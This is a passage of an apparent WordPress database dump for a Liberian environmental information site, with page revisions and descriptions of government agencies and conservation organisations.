href=\"https://ekmsliberia.info/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-2/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 15:10:00','2019-11-10 15:10:00','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(711,1,'2019-11-10 15:10:31','2019-11-10 15:10:31','<h2>Institutions</h2>		\n	<h4><a href=\"https://ekmsliberia.info/national-bureau-of-concessions/\">National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/conservation-international/\">Conservation International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-2/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 15:10:31','2019-11-10 15:10:31','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(713,1,'2019-11-10 17:04:54','2019-11-10 17:04:54','<h2>Institutions</h2>		\n	<h4><a href=\"https://ekmsliberia.info/national-bureau-of-concessions/\">National Bureau of Concessions</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/conservation-international/\">Conservation International</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-2/\">Ministry of Agriculture</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n			<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 17:04:54','2019-11-10 17:04:54','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(714,1,'2019-11-10 17:20:54','2019-11-10 17:20:54','','Institutions','','publish','closed','closed','','institution','','','2021-08-11 16:36:33','2021-08-11 16:36:33','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=714',0,'_pods_pod','',0),(975,1,'2019-10-30 11:58:32','2019-10-30 11:58:32','','Environmental Protection Agency','','publish','closed','open','','environmental-protection-agency','','','2019-11-14 11:56:22','2019-11-14 11:56:22','',0,'https://ekmsliberia.info/?post_type=forum&#038;p=975',0,'forum','',0),(1174,1,'2019-10-31 12:38:32','2019-10-31 12:38:32','','United Nations Convention on Biological Diversity','','publish','closed','open','','united-nations-convention-on-biological-diversity','','','2019-10-31 12:38:32','2019-10-31 12:38:32','',0,'https://ekmsliberia.info/?post_type=forum&amp;p=1174',0,'forum','',0),(1176,1,'2019-10-31 12:39:29','2019-10-31 12:39:29','','United Nations Convention to Combat Desertification','','publish','closed','open','','united-nations-convention-to-combat-desertification','','','2019-10-31 12:39:29','2019-10-31 12:39:29','',0,'https://ekmsliberia.info/?post_type=forum&amp;p=1176',0,'forum','',0),(1179,1,'2019-10-31 12:40:37','2019-10-31 12:40:37','','United Nations Framework Convention on Climate Change','','publish','closed','open','','united-nations-framework-convention-on-climate-change','','','2019-10-31 12:40:37','2019-10-31 12:40:37','',0,'https://ekmsliberia.info/?post_type=forum&amp;p=1179',0,'forum','',0),(1186,1,'2019-11-01 11:03:18','2019-11-01 11:03:18','Good morning this is just a test of the discussion forum','testing testing','','publish','closed','closed','','testing-testing','','','2019-11-01 11:03:18','2019-11-01 11:03:18','',0,'https://ekmsliberia.info/forums/topic/testing-testing/',0,'topic','',0),(1356,1,'2019-11-04 01:26:29','2019-11-04 01:26:29',' The Liberian code of laws relating to conservation of forests, forest reserves, conservation of wildlife and fish resources and national parks.','The Liberia Wildlife Law','','publish','closed','closed','','the-liberia-wildlife-law','','','2019-11-04 01:26:29','2019-11-04 01:26:29','',0,'https://ekmsliberia.info/forums/topic/the-liberia-wildlife-law/',0,'topic','',0),(1544,1,'2019-11-05 03:01:12','2019-11-05 03:01:12','LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and\r\n\r\nMore specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.\r\n','Liberia Institute for Statistics and Geo-Information Services','','publish','closed','closed','','liberia-institute-for-statistics-and-geo-information-services','','','2021-08-17 20:42:36','2021-08-17 20:42:36','',0,'https://ekmsliberia.info/liberia-institute-for-statistics-and-geo-information-services/',9,'institution','',0),(1582,1,'2019-11-05 04:24:47','2019-11-05 04:24:47','The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.\r\n\r\nThe EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.\r\n\r\nThe Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.\r\n\r\nThe Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.\r\n<h5>Mandate</h5>\r\nThe Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\r\n','Environmental Protection Agency','','publish','closed','closed','','environmental-protection-agency','','','2021-08-17 18:44:34','2021-08-17 18:44:34','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1582',5,'institution','',0),(1584,1,'2019-11-05 04:30:44','2019-11-05 04:30:44','The Ministry of Gender, Children and Social Protection (MoGCSP) was created by an Executive Instrument 1 (E.I. 1) in January, 2013 as a successor to the Ministry of Women and Children\'s Affairs. The primary objective for its establishment was to have a Ministry responsible for policy formulation, coordination and monitoring and evaluation of Gender, Children and Social Protection issues within the context of the national development agenda.\r\nThis will lead to the achievement of gender equality, equity, the empowerment of women and girls, promoting the survival and development of children, thus ensuring their rights. It will also ensure harmonizing social protection interventions to better target the vulnerable, excluded and persons with disability and integrate fulfilment of their rights, empowerment and full participation into national development.\r\n\r\nThe primary objective for its establishment was to have a Ministry responsible for policy formulation, coordination and monitoring and evaluation of Gender, Children and Social Protection issues within the context of the national development agenda. This will lead to the achievement of gender equality, equity, the empowerment of women and girls, promoting the survival and development of children, thus ensuring their rights. It will also ensure harmonizing social protection interventions to better target the vulnerable, excluded and persons with disability and integrate fulfilment of their rights, empowerment and full participation into national development.','Ministry of Gender, Children and Social Protection','','publish','closed','closed','','ministry-of-gender-children-and-social-protection','','','2021-09-08 12:37:39','2021-09-08 12:37:39','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1584',32,'institution','',0),(1586,1,'2019-11-05 04:31:50','2019-11-05 04:31:50','The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.\r\n\r\nIntegrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.','Forestry Development Authority','','publish','closed','closed','','forestry-development-authority','','','2021-08-17 18:52:18','2021-08-17 18:52:18','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1586',6,'institution','',0),(1588,1,'2019-11-05 04:35:08','2019-11-05 04:35:08','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\r\n\r\nThe overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.\r\n','National Fisheries & Aquaculture Authority','','publish','closed','closed','','national-fisheries-aquaculture-authority','','','2021-08-17 23:42:39','2021-08-17 23:42:39','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1588',30,'institution','',0),(1590,1,'2019-11-05 04:40:55','2019-11-05 04:40:55','National Legislature on Natural Resources Committee coming soon!','National Legislature on Natural Resource Committee','','publish','closed','closed','','national-legislature-on-natural-resource-committee','','','2021-10-21 20:43:10','2021-10-21 20:43:10','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1590',29,'institution','',0),(1592,1,'2019-11-05 04:43:22','2019-11-05 04:43:22','CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.\r\n\r\nCARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.','Central Agricultural Research Institute','','publish','closed','closed','','central-agricultural-research-institute','','','2022-09-14 14:08:29','2022-09-14 14:08:29','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1592',28,'institution','',0),(1594,1,'2019-11-05 04:44:15','2019-11-05 04:44:15','The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.\r\n\r\nThe Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.','Ministry of Public Works','','publish','closed','closed','','ministry-of-public-works','','','2021-09-08 12:34:50','2021-09-08 12:34:50','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1594',27,'institution','',0),(1596,1,'2019-11-05 04:44:47','2019-11-05 04:44:47','The Liberia Airport Authority is responsible for the supervision and management of all airports and their facilities in Liberia (international and domestic; with the exception of the Air Traffic Control (ATC), Fire and Rescue, Meteorology and Security (especially baggage and passenger screening) which is the responsibility of the Liberia Civil Aviation Authority in accordance with ICAO standards.\r\nThe Liberia Airport Authority is governed by an appointed board consisting of seven (7) members appointed by the President of the Republic of Liberia.\r\n','Liberia Airport Authority','','publish','closed','closed','','liberia-airport-authority','','','2021-08-17 23:34:02','2021-08-17 23:34:02','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1596',26,'institution','',0),(1598,1,'2019-11-05 04:45:41','2019-11-05 04:45:41','The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.\r\n\r\nThrough its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.\r\n','Ministry of Transport','','publish','closed','closed','','ministry-of-transport','','','2021-08-17 23:32:10','2021-08-17 23:32:10','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1598',25,'institution','',0),(1600,1,'2019-11-05 04:46:05','2019-11-05 04:46:05','The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.\r\n\r\nIn addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.\r\n\r\nThe core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.\r\n<h4>Mandate</h4>\r\nThe Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.\r\n','Ministry of Agriculture','','publish','closed','closed','','ministry-of-agriculture','','','2021-08-17 20:45:29','2021-08-17 20:45:29','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1600',11,'institution','',0),(1602,1,'2019-11-05 04:47:01','2019-11-05 04:47:01','The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.\r\n\r\nThe LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\r\n','Liberia Land Authority','','publish','closed','closed','','liberia-land-authority','','','2021-08-17 20:40:56','2021-08-17 20:40:56','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1602',8,'institution','',0),(1604,1,'2019-11-05 04:47:34','2019-11-05 04:47:34','National Concession information coming soon!','Liberia National Bureau of Concessions','','publish','closed','closed','','liberia-national-bureau-of-concessions','','','2022-09-14 14:23:41','2022-09-14 14:23:41','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1604',24,'institution','',0),(1606,1,'2019-11-05 04:49:50','2019-11-05 04:49:50','LiMA coming soon!\r\n','Liberia Maritime Authority','','publish','closed','closed','','liberia-maritime-authority','','','2021-08-17 22:25:27','2021-08-17 22:25:27','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1606',23,'institution','',0),(1608,1,'2019-11-05 04:50:14','2019-11-05 04:50:14','The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.\r\n\r\nThe Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.\r\n<h2>Featured Projects</h2>\r\n<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img title=\"Enhancing Resilience of Vulnerable Coastal Areas\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" sizes=\"(max-width: 1024px) 100vw, 1024px\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" width=\"1024\" height=\"530\" /></a> <a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas </a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\r\n\r\n&nbsp;','Ministry of Mines and Energy','','publish','closed','closed','','ministry-of-mines-and-energy','','','2021-08-17 18:59:10','2021-08-17 18:59:10','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1608',7,'institution','',0),(1610,1,'2019-11-05 04:50:42','2019-11-05 04:50:42','The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.\r\n','Ministry of Internal Affairs','','publish','closed','closed','','ministry-of-internal-affairs','','','2021-08-17 22:23:02','2021-08-17 22:23:02','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1610',22,'institution','',0),(1612,1,'2019-11-05 04:51:21','2019-11-05 04:51:21','As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.\r\n\r\nConservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.\r\n\r\nBuilding upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.\r\n','Conservation International','','publish','closed','closed','','conservation-international','','','2021-08-17 21:40:24','2021-08-17 21:40:24','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1612',19,'institution','',0),(1614,1,'2019-11-05 04:53:15','2019-11-05 04:53:15','Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.\r\n\r\nDrawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.\r\n\r\nWe are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.\r\n\r\nRecognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.\r\n\r\nCommunity involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.\r\n\r\nFFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.\r\n','Fauna & Flora International','','publish','closed','closed','','fauna-flora-international','','','2021-08-17 21:23:32','2021-08-17 21:23:32','',0,'https://ekmsliberia.info/?post_type=inst_resource&#038;p=1614',15,'institution','',0),(1616,1,'2019-11-10 17:46:13','2019-11-10 17:46:13','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>		\n			<h2>CARI Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2019-11-10 17:46:13','2019-11-10 17:46:13','',1592,'https://ekmsliberia.info/1592-revision-v1/',0,'revision','',0),(1617,1,'2019-11-10 17:46:13','2019-11-10 17:46:13','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2019-11-10 17:46:13','2019-11-10 17:46:13','',1592,'https://ekmsliberia.info/1592-revision-v1/',0,'revision','',0),(1618,1,'2019-11-10 17:47:12','2019-11-10 17:47:12','CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.\r\n\r\nCARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2019-11-10 17:47:12','2019-11-10 17:47:12','',1592,'https://ekmsliberia.info/1592-revision-v1/',0,'revision','',0),(1619,1,'2019-11-10 17:48:39','2019-11-10 17:48:39','<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.</p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.</p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.</p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.</p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.</p><p>FFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.</p>		\n			<h2>FFI Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2019-11-10 17:48:39','2019-11-10 17:48:39','',1614,'https://ekmsliberia.info/1614-revision-v1/',0,'revision','',0),(1620,1,'2019-11-10 17:48:40','2019-11-10 17:48:40','<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.</p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.</p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.</p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.</p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.</p><p>FFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2019-11-10 17:48:40','2019-11-10 17:48:40','',1614,'https://ekmsliberia.info/1614-revision-v1/',0,'revision','',0),(1621,1,'2019-11-10 17:49:42','2019-11-10 17:49:42','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p>		\n			<h2>CI Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-10 17:49:42','2019-11-10 17:49:42','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(1622,1,'2019-11-10 17:49:42','2019-11-10 17:49:42','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.</p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.</p>		\n			<h2>CI Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-10 17:49:42','2019-11-10 17:49:42','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(1623,1,'2019-11-10 17:50:05','2019-11-10 17:50:05','<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.</p>		\n			<h2>MIA Resources</h2>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Internal Affairs','','inherit','closed','closed','','1610-revision-v1','','','2019-11-10 17:50:05','2019-11-10 17:50:05','',1610,'https://ekmsliberia.info/1610-revision-v1/',0,'revision','',0),(1624,1,'2019-11-10 17:50:05','2019-11-10 